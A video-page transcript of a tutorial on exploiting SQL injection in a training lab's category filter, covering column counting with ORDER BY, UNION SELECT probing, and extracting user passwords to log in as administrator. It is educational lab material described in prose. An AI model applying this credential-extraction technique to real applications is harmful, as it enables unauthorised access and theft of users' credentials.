Exploit SQL Injection to Retrieve Admin Password

Video Statistics and Information

Video
Captions Word Cloud
Reddit Comments
Captions
if an application is vulnerable to sql injection then attackers might be able to retrieve data from different tables in the backend database one of the main targets would be a table that stores the details of application users including the username and password during this video we look at a scenario where an attacker exploit a sql injection vulnerability to extract username and password of application users from the database for the purpose of this video we use a sql injection lab from web security academy and you can find the link to this lab in the video description to solve this lab we need to exploit the sql injection vulnerability in the search function of the application to retrieve usernames and passwords from a table called users and then log on into the application as the administrator user ok let's get started by clicking on access the lab the home page of the application contains the list of products and their description there is a search function that filters the items based on the category we turn the verb intercept on and then in the home page choose one of the categories looking at the get request in burp we see it contains a url parameter called category and its value is the category that we just selected in the application home page okay let's forward this request the application completes the request and returns the list of the items within the chosen category now let's see if we change the category value and add a special character how would the application process the unexpected data be sure the burp intercept is on and then choose a category in burp we go to the url parameter and add a single code to its value and then forward the request this time the application returns a server error indicating that the submitted data containing a single code character has interfered with the sql query that the filter function is using to retrieve data from backend database the return error in the application response is a sign that the category parameter in the filter function is vulnerable to sql injection based on the lab description we already know that the application database has a table called users and this table contains two columns called username and password now that we have identified a sql injection in the category parameter within the filter function the next step is to perform sql injection union attacks to exploit this vulnerability and retrieve the list of username and passwords from users table but what is a sql injection union attack when an application is vulnerable to sql injection and the result of the sql query is returned within the application response then we can take advantage of union operator to inject our own sql query to extract data from other tables of the database let's take a look at the sample sql query to get a better understanding of how union operator is used in sql queries this sample query executes both of the select queries and returns a single result set containing the data from c1 and c2 columns in table 1 and c4 and c5 columns in table 2. there are two basic rules for combining the result set of to select queries when using union operator the number of columns in both select queries must be the same and the data type must be compatible now that we know what union operator is and what the rules are for using union select query in order to inject our own query and ensure that the application executes the union select query without an error first we need to determine the number of columns and then the data type of the columns in the original sql query that the filter function is using we can use order by keyword to determine the number of columns in a sql query the order by keyword is used to sort a result set returned from a sql query in ascending or descending order based on the values of one or more columns in order by clause we can specify the column name or column number since we don't know the column names in the filter function sql query we will use column numbers starting from 1 and we'll increase the number until we get an error message in the application response alright let's go back to the application home page and choose a category in burp right click and choose send to repeater we turn the intercept off and we go to the repeater tab in the request tab first we right click and we choose url encode as you type then we go to the category parameter value and add single quote order by one following by two hyphens to ask the query to sort the result set based on the first column then we send the request we don't get an error message so we know the filter function query contains at least one column now we change the column number to 2 and send the request we get 200 http response code so far we know that the original query contains at least two columns once again we increase the number in order by clause and send the request this time the http response returned an error which means the original query doesn't have three columns alright so far we know that the sql query contains only two columns so the next step is to determine the data type of these columns since our goal is to extract username and password values from users table in the original query we are interested in the columns that contain string value to determine the columns that return string data we use a series of union select queries we already know that the original query returns two columns so we only need two union select queries and each time we put a string value in one of the columns and use null for the other column null is compatible with all data type so it will not cause an error when the application executes the injected query we use these two union select queries to determine the data type of columns in the filter function sql query the first query checks if the first column in the original query is a string and the second query checks if the second column in the original query contains a string value when we inject these payloads if we get an error message then the data type of the column in the filter function sql query is not compatible with the string data all right back to the burp repeater once again we go to the category parameter and add the first payload to its value and send the request we get 200 http response code so the first column contains the string data we change the parameter value to the second union select payload and then forward the request as we see the application didn't return an error so the data type of the second column is also a string so we managed to determine the number of columns and also the data type of the columns in the original sql query now that we know the original query contains two columns and both contain a string value we can use this union select payload to retrieve username and password from users table in burp repeater we go to the category parameter value and add the union select query then we send the request the request was completed by the application and no error returned by inspecting the http response we can see the list of users and their password so we managed to successfully retrieve the username and password from users table let's copy the admin credentials and go back to the web browser before we proceed to log on into the application using the credentials that we just copied from burp repeater let's take a look at the application url in the address bar of the web browser since the application is using get http request for filter function we can see the category parameter in the url so we actually could exploit the sql injection directly from url and without a proxy tool let's repeat the last step we go to the url and add the union select payload to the category value and then submit the url as we see the application returns the list of users credentials now that we have the credentials for the administrator user from the top right corner of the page we click on my account in the login page we fill out the username and password using the administrator user credentials and then click on login as we see we could login into the admin account and manage to solve this lab by exploiting sql injection if you enjoyed watching this video please give it a like and if you want to see more videos like this be sure to subscribe to the channel as i upload new videos every week
Info
Channel: TraceTheCode
Views: 6,598
Rating: undefined out of 5
Keywords:
Id: U_08XtEM3ME
Channel Id: undefined
Length: 9min 42sec (582 seconds)
Published: Thu Mar 24 2022
Related Videos
SQL Injection Tutorial For Beginners
TraceTheCode
1.8K
Exploit SQL injection To Bypass Login
TraceTheCode
70K
HACKING a DATABASE, SO EASY?! | SQL INJECTIONS
Fransosiche
15K
SQL Injection Hacking Tutorial (Beginner to Advanced)
David Bombal
195K
Exploit XXE to Perform SSRF Attack
TraceTheCode
1.5K
Bypassing SQL Filters (picoCTF Web Gauntlet)
The Cyber Mentor
43K
Basics of SQL Injection - Penetration Testing for Ethical Hackers
freeCodeCamp.org
166K
Host Header Injection Attack | Authentication Bypass
TraceTheCode
23K
Exploit Cross-Site Scripting(XSS) To Capture Passwords
TraceTheCode
20K
SQL Injection Beginner Crash Course
zSecurity
56K
Get all usernames and password | sql injection union attack retrieving data from other tables
CyberWorldSec
10K
How a Hacker Could Attack Web Apps with Burp Suite & SQL Injection
Null Byte
153K
SQLite Blind SQL Injection - HackTheBox Cyber Apocalypse CTF
John Hammond
71K
Blind MongoDB NoSQL Injection - HackTheBox Cyber Apocalypse CTF
John Hammond
47K
Two Factor Authentication(2FA) Bypass Using Brute-Force Attack
TraceTheCode
35K
advanced SQL injection
Loi Liang Yang
57K
I legally defaced this website.
thehackerish
506K
Note
Please note that this website is currently a work in progress! Lots of interesting data and statistics to come.